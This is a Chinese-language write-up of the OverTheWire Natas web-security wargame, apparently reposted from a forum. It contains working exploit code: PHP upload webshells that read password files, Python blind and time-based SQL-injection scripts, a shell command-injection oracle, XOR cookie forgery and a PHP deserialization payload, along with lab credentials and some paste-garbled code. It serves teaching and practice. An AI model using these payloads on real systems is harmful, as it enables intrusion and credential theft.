web安全Wargame—Natas解题思路(1-26)
前言:
接下来给大家分享一下,1-20题的WriteUp。
Natas0:
Natas1:
Natas2:
Natas3:
Natas4:
Natas5:
Natas6:
Natas7:
Natas8:
Natas9:
Natas10:
Natas11:
// Natas11 level source: repeating-key XOR applied to the cookie data. Nothing in this
// function authenticates the data, and XOR with a fixed key is reversible from a single
// known plaintext/ciphertext pair, so the key can be recovered and any settings re-encoded.
// Mitigation: keep such state server-side in the session, or protect the cookie with an HMAC.
function xor_encrypt( $in ){
$key = '<censored>' ; # predefined key (censored in the published source)
$text = $in ; # input parameter
$outText = '' ; # output buffer
// Iterate through each character
for ( $i =0; $i < strlen ( $text ); $i ++) { # loop over every byte of the input
$outText .= $text [ $i ] ^ $key [ $i % strlen ( $key )]; # XOR each input byte with the key byte at the same offset; the key wraps around (modulo its length) when it is shorter than the input, and the result is appended to the output
}
return $outText ; # return the "encrypted" bytes
}
<?php
// Natas11 writeup, step 1: recover the XOR key. Per the writeup the cookie holds
// base64(xor_encrypt(json_encode(settings))); because XOR is its own inverse, plaintext XOR
// ciphertext yields the key stream. $defaultdata is the known plaintext (the level's default
// settings) and $data the base64 cookie value as observed (presumably copied from the browser).
$defaultdata = array ( "showpassword" => "no" , "bgcolor" => "#ffffff" );
$data = 'ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw' ;
// XOR $in with $out byte by byte; with a repeating key the output is that key repeated
// for the length of the plaintext.
function xor_encrypt( $in , $out ) {
$key = '' ;
$text = $in ;
for ( $i =0; $i < strlen ( $text ); $i ++) {
$key .= $text [ $i ] ^ $out [ $i ]; # $out[$i] is read unchecked: if the decoded cookie is shorter than the plaintext, PHP emits an offset notice here
}
return $key ;
}
echo xor_encrypt(json_encode( $defaultdata ), base64_decode ( $data ));
?>
<?php
// Natas11 writeup, step 2: re-create the cookie with showpassword set to "yes", using the
// key recovered in the previous listing. The server accepts it because the cookie carries
// no integrity check: anyone holding the key can produce a valid value for any settings.
// Server-side fix: never store authorisation flags in a client-rewritable cookie; keep them
// in the session, or add an HMAC over the encoded data and verify it before use.
$defaultdata = array ( "showpassword" => "yes" , "bgcolor" => "#ffffff" );
function xor_encrypt( $in ) {
$key = 'qw8J' ; # the key recovered from the known plaintext
$text = $in ;
$outText = '' ;
// Iterate through each character
for ( $i =0; $i < strlen ( $text ); $i ++) {
$outText .= $text [ $i ] ^ $key [ $i % strlen ( $key )]; # same repeating-key XOR as the level source
}
return $outText ;
}
echo base64_encode (xor_encrypt(json_encode( $defaultdata ))); # the value to place in the cookie
?>
Natas12:
<?php
// Natas12: contents of the file uploaded through the level's upload form. Once the server
// stores it under a .php name inside the document root, the web server executes it and
// system() prints the next password. The weakness is in the upload handler, not in this
// file: presumably it keeps a client-chosen extension (TODO confirm against the level source).
// Mitigation: server-side allow-list of extensions and content types, server-generated file
// names, storage outside the document root, and no script handler on the upload directory.
system( 'cat /etc/natas_webpass/natas13' );
?>
Natas13:
GIF89a
<?php
// Natas13: the Natas12 payload prefixed with the GIF89a magic bytes. The prefix is presumably
// there to satisfy an image-signature check in the upload handler (TODO confirm against the
// level source); PHP emits the text outside the <?php tag as-is and still runs system().
// Mitigation: a magic-byte check does not make a file safe to serve from a script-enabled
// directory — re-encode images server-side and store uploads where nothing executes.
system( 'cat /etc/natas_webpass/natas14' );
?>
Natas14:
Natas15:
$query = "SELECT * from users where username=\"" . $_REQUEST [ "username" ]. "\"" ;
-- Natas15: table definition as published on the level page.
CREATE TABLE `users` (
`username` varchar(64) DEFAULT NULL,
`password` varchar(64) DEFAULT NULL -- the writeup's LIKE probes match this column directly, so it appears to hold the clear-text password; store a salted password hash (bcrypt/argon2) instead
);
'username' : 'natas16" AND password LIKE binary "%s"%字符'
# Natas15 script from the writeup (Python 2: print statements; the spaced "< =" is presumably a
# formatting artefact for "<="). It recovers the next password one character at a time through
# a boolean oracle: the page answers "This user exists" when the injected LIKE pattern matches.
# Defender's view: the fix is a parameterized query together with a response that does not
# depend on the password comparison. In logs this shows up as a burst of POSTs to index.php
# whose username field contains quotes, AND/LIKE keywords and % wildcards.
import requests
url = "http://natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J@natas15.natas.labs.overthewire.org/index.php"
chr = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz"  # candidate alphabet (shadows the builtin chr)
payload = r 'natas16" AND password LIKE binary "%s" #'  # %s receives the growing pattern; the trailing # inside the string is a SQL comment
# LIKE pattern matching is case-insensitive by default, so BINARY is added to make it case-sensitive.
key = "%"  # pattern so far; the trailing % wildcard stays at the end
while len (key) < = 32 : # loop 32 times
for i in chr : # determine the next character
a = key[: - 1 ] + i + key[ - 1 :]  # insert the candidate before the trailing wildcard
print a
req = requests.post(url = url,data = { 'username' :payload % a})
if "This user exists" in req.text:  # match -> the candidate is correct
key = a
print key
print key # print the recovered key
passthru ( "grep -i \"$key\" dictionary.txt" );
passthru ( "grep-i " ( $grep ^a etc/natas_webpasswd/natas17)wrong \ " dictionary.txt" );
# Natas16 script from the writeup (Python 2 print syntax; the bracketed [color]/[font]/[align]
# tags on two of the lines below are forum-markup residue from the paste, not code).
# Command-injection oracle: the search term is wrapped in $( ... ) so the shell evaluates it
# inside the level's grep command, and the page content differs depending on whether the
# guessed prefix matched. As pasted, the loop index i is never used and the whole alphabet is
# appended each time, so the script does not narrow to a single character per iteration.
# Defender's view: never pass request data through a shell — escapeshellarg() or a shell-free
# search closes this. Detection: search requests whose term contains "$(" or backticks.
import requests
url = "http://natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh@natas16.natas.labs.overthewire.org/"
key = ''  # recovered prefix so far
char = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' [ / color][ / font][ / align][align = left][font = 宋体][color = Black]  # trailing tags are paste residue
[ / color][ / font][ / align][align = left][font = 宋体][color = Black] while len (key) < 32 :  # leading tags are paste residue; password length is 32
for i in range ( len (char)):
payload = { 'needle' : '$(grep ^' + key + char + '.* /etc/natas_webpass/natas17)wrong' , 'submit' : 'Search' }  # the response only changes when the injected prefix matches
req = requests.get(url = url,params = payload)
if 'wrong' not in req.text:
key + = char  # ("+ =" is presumably a formatting artefact for "+=")
print key
Natas17:
# Natas17 script from the writeup (Python 2: print statement, "except X, e", integer "/").
# Time-based blind probe: the injected IF() calls sleep(2) when the guessed value is below the
# real byte, so a delayed response — which exceeds the 2-second request timeout — is the only
# signal. Each of the 32 positions is found by binary search over printable ASCII (32..126).
# Defender's view: a parameterized query removes the injection entirely. In logs this shows up
# as POSTs whose username field contains sleep(/if(/ascii( and as a run of requests that each
# take close to 2 seconds.
import requests
[ / color] [color = Black]  # forum-markup residue from the paste, not code
url = 'http://natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw@natas17.natas.labs.overthewire.org/index.php'
key = ''  # recovered characters so far
for i in range ( 1 , 33 ):  # 1-based position within the 32-character value
a = 32  # lower bound of the search range
c = 126  # upper bound of the search range
while a<c:
b = (a + c) / 2  # midpoint; integer division in Python 2 (a float under Python 3, which chr() rejects)
payload = r 'natas18" and if(%d<ascii(mid(password,%d,1)),sleep(2),1) and "" like "' % (b,i)
try :
req = requests.post(url = url,data = { "username" :payload},timeout = 2 )
except requests.exceptions.Timeout,e:  # timed out -> sleep() ran -> the real byte is above b
a = b + 1
b = (a + c) / 2
continue
c = b  # answered promptly -> the real byte is at most b
key + = chr (b)  # ("+ =" is presumably a formatting artefact for "+=")
print key
Natas18:
![](https://bbs.ichunqiu.com/data/attachment/forum/201808/29/151625jpb1r9db90r5sb6j.png.thumb.jpg)
![](https://bbs.ichunqiu.com/data/attachment/forum/201808/29/151649u57b1omooqmmm657.png.thumb.jpg)
![](https://bbs.ichunqiu.com/data/attachment/forum/201808/29/151658az7pcr74f8qmfxrq.png.thumb.jpg)
![](https://bbs.ichunqiu.com/data/attachment/forum/201808/29/151706qhyeemtbhbrthhq9.png.thumb.jpg)
Natas19:
# Generate every four-digit string "<i><j>" with i and j each in 30..39 (100 values)
# and write them one per line to 1.txt. The writeup uses the file as a candidate list
# for the Natas19 step; what the digits encode is not shown on this page.
a = ['%d%d' % (i, j) for i in range(30, 40) for j in range(30, 40)]
with open("1.txt", "w") as f:
    f.writelines(line + "\n" for line in a)
查看第一个网页源码,发现主要功能就是判断session[admin]=1后显示密码;
// Level source fragment (the closing brace is outside the quoted lines). The gate is only a
// session flag, which is sound as long as nothing lets a client write arbitrary session keys.
// "== 1" is a loose comparison, so "1", true and 1.0 all satisfy it; prefer "=== 1" or, better,
// derive the admin role from the authenticated user record rather than from a stored flag.
if ( $_SESSION and array_key_exists ( "admin" , $_SESSION ) and $_SESSION [ "admin" ] == 1) {
print "You are an admin. The credentials for the next level are:<br>" ; // the admin branch prints the next level's credentials
print "<pre>Username: natas22\n" ;
print "Password: <censored></pre>" ;
print "Password: <censored></pre>";
// if update was submitted, store it
// Mass assignment: every request parameter, whatever its name, is copied into the session,
// so a client can set "admin" (or any other key the application trusts) by itself.
// Fix: copy only an explicit allow-list of the form's field names, e.g.
//   foreach ( $allowed_keys as $key ) { if ( isset( $_REQUEST[ $key ] ) ) $_SESSION[ $key ] = $_REQUEST[ $key ]; }
if ( array_key_exists ( "submit" , $_REQUEST )) {
foreach ( $_REQUEST as $key => $val ) {
$_SESSION [ $key ] = $val ;
}
}
Natas22:
// Natas22 level source (fragment; the outer if is closed outside the quoted lines).
if ( array_key_exists ( "revelio" , $_GET )) {
// only admins can reveal the password
if (!( $_SESSION and array_key_exists ( "admin" , $_SESSION ) and $_SESSION [ "admin" ] == 1)) {
// header() only queues the redirect: unless something after this fragment stops the script,
// the rest of the page is still generated and sent along with the 302, and a client that
// does not follow redirects reads it. Fix: `exit;` immediately after header(), and keep the
// sensitive output inside the authorised branch only.
header( "Location: /" );
}
// if update was submitted, store it
// Mass assignment: every request parameter, whatever its name, is copied into the session,
// so a client can set "admin" (or any other key the application trusts) by itself.
// Fix: copy only an explicit allow-list of the form's field names, e.g.
//   foreach ( $allowed_keys as $key ) { if ( isset( $_REQUEST[ $key ] ) ) $_SESSION[ $key ] = $_REQUEST[ $key ]; }
if ( array_key_exists ( "submit" , $_REQUEST )) {
foreach ( $_REQUEST as $key => $val ) {
$_SESSION [ $key ] = $val ;
}
}
// Natas23 level source (fragment; the outer if is closed outside the quoted lines).
if ( array_key_exists ( "passwd" , $_REQUEST )){
// strstr() is a substring test, not an equality check, and "> 10" compares a string with an
// integer, so the outcome depends on PHP's loose string-to-number conversion rules (which
// changed in PHP 8) rather than on the value being the expected password.
// Fix: is_string() plus hash_equals() against the expected value, and compare numbers only
// after validating the input with filter_var(..., FILTER_VALIDATE_INT).
if ( strstr ( $_REQUEST [ "passwd" ], "iloveyou" ) && ( $_REQUEST [ "passwd" ] > 10 )){
echo "<br>The credentials for the next level are:<br>" ;
echo "<pre>Username: natas24 Password: <censored></pre>" ;
}
else {
echo "<br>Wrong!<br>" ;
}
Natas24:
< ?php
// Natas24 level source (the open tag is reproduced as pasted). strcmp() only behaves as an
// equality check when both arguments are strings: on PHP 7 and earlier a non-string argument
// makes it return NULL with a warning, and !NULL is true, so the branch is taken without a
// matching password (PHP 8 throws a TypeError instead). Fix: reject non-strings first and
// compare in constant time, e.g.
// `if ( is_string( $_REQUEST[ "passwd" ] ) && hash_equals( "<censored>", $_REQUEST[ "passwd" ] ) )`.
if ( array_key_exists ( "passwd" , $_REQUEST ) ) {
if ( !strcmp ( $_REQUEST[ "passwd" ] , "<censored>" ) ) {
echo "<br>The credentials for the next level are:<br>" ;
echo "<pre>Username: natas25 Password: <censored></pre>" ;
}
else {
echo "<br>Wrong!<br>" ;
}
}
function setLanguage(){ # choose the language file to include
/* language setup */
// The "lang" parameter is concatenated into an include path; the only protection is the
// string filtering in safeinclude(), which is a denylist. Prefer an allow-list of known
// language names (in_array with strict = true) or a realpath() check that the resolved
// file lies inside the language directory.
if ( array_key_exists ( "lang" , $_REQUEST ))
if (safeinclude( "language/" . $_REQUEST [ "lang" ] ))# filter and include the requested file
return 1;
safeinclude( "language/en" ); # fall back to English
}
function safeinclude( $filename ){ # filter the requested path, then include it
// check for directory traversal
if ( strstr ( $filename , "../" )){ # traversal filter: repairs the string instead of rejecting it
logRequest( "Directory traversal attempt! fixing request." );
// str_replace() makes a single pass: each "../" is removed once and the result is not
// re-scanned, so a string that only becomes "../" after one removal passes the filter.
// Reject instead of repairing, or resolve with realpath() and require the result to start
// with the language directory.
$filename = str_replace ( "../" , "" , $filename );
}
// dont let ppl steal our passwords
if ( strstr ( $filename , "natas_webpass" )){ # file-access denylist: a single substring, nothing else is blocked
logRequest( "Illegal file access detected! Aborting!" );
exit (-1);
}
// add more checks...
if ( file_exists ( $filename )) { # existence check only; no restriction on directory or file type
// include() executes any readable file, including ones the application writes itself
// (see logRequest), so an allow-list of known language files is the only robust guard here.
include ( $filename );
return 1;
}
return 0;
}
function logRequest( $message ){ # append one entry to a per-session request log
$log = "[" . date ( "d.m.Y H::i:s" ,time()) . "]" ; # timestamp (format string as in the level source)
$log = $log . " " . $_SERVER [ 'HTTP_USER_AGENT' ];# User-Agent copied verbatim: it is client-controlled, so whatever the client sends lands in the file unescaped (log injection)
$log = $log . " \"" . $message . "\"\n" ; # append the message
// The log path is derived from session_id(), which the client normally knows from its own
// cookie, and the file lives under the application's own directory tree. Together with the
// unescaped User-Agent above and the include() in safeinclude(), log content is at risk of
// being interpreted as code. Mitigation: encode or strip non-printable and markup characters
// before logging, keep logs outside any includable path, and check fopen()'s return value
// (fwrite() on false only emits a warning here).
$fd = fopen ( "/var/www/natas/natas25/logs/natas25_" . session_id() . ".log" , "a" ); # write the entry to the log file
fwrite( $fd , $log );
fclose( $fd );
}
// Natas26 level source: a logger whose file path and messages are plain private fields.
// If an instance is ever reconstructed with unserialize() from client-controlled data (the
// writeup's following listing builds such an object), __construct() does not run: $logFile and
// $exitMsg arrive with whatever values the client chose, and __destruct() still writes $exitMsg
// to $logFile when the object is released. Mitigation: do not unserialize untrusted input (use
// JSON for client-side state), or at minimum unserialize($data, ['allowed_classes' => false]).
class Logger{
private $logFile ; # three private fields: log path, start marker, end marker
private $initMsg ;
private $exitMsg ;
function __construct( $file ){ # runs on "new" only, not when an object is unserialized
// initialise variables
$this ->initMsg= "#--session started--#\n" ;
$this ->exitMsg= "#--session end--#\n" ;
$this ->logFile = "/tmp/natas26_" . $file . ".log" ; # $file is embedded in the path without filtering
// write initial message
$fd = fopen ( $this ->logFile, "a+" );
fwrite( $fd , $initMsg ); # NOTE: reads the undefined local $initMsg rather than $this->initMsg, so the start marker is never written
fclose( $fd );
}
function log( $msg ){ # append one line to the log file
$fd = fopen ( $this ->logFile, "a+" );
fwrite( $fd , $msg . "\n" );
fclose( $fd );
}
function __destruct(){ # runs when the object is destroyed, including objects created by unserialize()
// write exit message
$fd = fopen ( $this ->logFile, "a+" );
fwrite( $fd , $this ->exitMsg);
fclose( $fd );
}
}
<?php
// Natas26 writeup: a stand-in class with the same name and private field names as the level's
// Logger, used only to produce a serialized string; no methods are needed because serialize()
// carries field values, not code. The defect this relies on is on the server — unserialize()
// of client-controlled data — and is fixed there (JSON, or allowed_classes => false), not here.
class Logger{
private $logFile ;
private $initMsg ;
private $exitMsg ;
function __construct(){ # fields carrying the injected values
$this ->initMsg= "" ;
$this ->exitMsg= "<?echo include '/etc/natas_webpass/natas27';?>" ; # content the real class's __destruct would write; uses the PHP short open tag, which needs short_open_tag enabled
$this ->logFile= "img/aaa.php" ; # destination path, presumably relative to the level's document root (TODO confirm)
}
}
$test = new Logger();
echo serialize( $test );
echo "\n" ;
echo base64_encode (serialize( $test )); # print the base64-encoded serialized string
?>
END~
大家有任何问题可以提问,更多文章可到i春秋论坛阅读哟~
转载于:https://www.cnblogs.com/ichunqiu/p/9554885.html